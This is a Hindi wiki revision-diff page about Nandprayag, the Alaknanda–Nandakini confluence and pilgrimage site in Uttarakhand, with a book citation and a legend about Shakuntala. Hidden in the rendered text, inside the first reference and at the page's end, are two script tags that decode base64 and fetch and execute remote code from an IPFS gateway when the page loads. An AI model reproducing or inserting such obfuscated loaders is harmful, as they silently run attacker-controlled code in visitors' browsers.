Difference between revisions of "नंदप्रयाग"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
 
Line 2: Line 2:
 
'''नंदप्रयाग''' [[गढ़वाल]], [[उत्तराखंड]] का एक प्राचीन [[तीर्थ स्थान]] है। [[नंदाकिनी नदी]], [[नंदा देवी पर्वत]] से निकल कर नंदप्रयाग में ही आकर [[अलकनंदा]] में मिल जाती है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=470|url=}}</ref>
 
'''नंदप्रयाग''' [[गढ़वाल]], [[उत्तराखंड]] का एक प्राचीन [[तीर्थ स्थान]] है। [[नंदाकिनी नदी]], [[नंदा देवी पर्वत]] से निकल कर नंदप्रयाग में ही आकर [[अलकनंदा]] में मिल जाती है।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=ऐतिहासिक स्थानावली|लेखक=विजयेन्द्र कुमार माथुर|अनुवादक= |आलोचक= |प्रकाशक=राजस्थान हिन्दी ग्रंथ अकादमी, जयपुर|संकलन= |संपादन= |पृष्ठ संख्या=470|url=}}</ref>
 
*जनश्रुति है कि प्राचीन काल में [[कण्व ऋषि]] का [[आश्रम]] तथा [[शकुंतला]] का जन्म स्थान नंदप्रयाग में ही था।
 
*जनश्रुति है कि प्राचीन काल में [[कण्व ऋषि]] का [[आश्रम]] तथा [[शकुंतला]] का जन्म स्थान नंदप्रयाग में ही था।
*[[अलकनंदा नदी|अलकनंदा]] और नंदाकिनी नदियों के संगम स्थल के लिए भी नंदप्रयाग प्रसिद्ध है, जिससे इसका नाम नंदप्रयाग हुआ है।<ref>गढ़वाल में संगम स्थानों का नाम प्राय: [[प्रयाग]] पर है, जैसे- देवप्रयाग, कर्णप्रयाग, रुद्रप्रयाग आदि।</ref>
+
*[[अलकनंदा नदी|अलकनंदा]] और नंदाकिनी नदियों के संगम स्थल के लिए भी नंदप्रयाग प्रसिद्ध है, जिससे इसका नाम नंदप्रयाग हुआ है।<ref>गढ़वाल में संगम स्थानों का नाम प्राय: [[प्रयाग]] पर है, जैसे- [[देवप्रयाग]], [[कर्णप्रयाग]], [[रुद्रप्रयाग]] आदि।</ref>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}

Latest revision as of 07:31, 26 July 2012

[[chitr:Nandaprayag.jpg|thumb|alakananda aur nandakini ka sangam, nandaprayag, uttarakhand]] nandaprayag gadhaval, uttarakhand ka ek prachin tirth sthan hai. nandakini nadi, nanda devi parvat se nikal kar nandaprayag mean hi akar alakananda mean mil jati hai.[1]

  • janashruti hai ki prachin kal mean kanv rrishi ka ashram tatha shakuantala ka janm sthan nandaprayag mean hi tha.
  • alakananda aur nandakini nadiyoan ke sangam sthal ke lie bhi nandaprayag prasiddh hai, jisase isaka nam nandaprayag hua hai.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. aitihasik sthanavali |lekhak: vijayendr kumar mathur |prakashak: rajasthan hindi granth akadami, jayapur |prishth sankhya: 470 | <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>
  2. gadhaval mean sangam sthanoan ka nam pray: prayag par hai, jaise- devaprayag, karnaprayag, rudraprayag adi.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>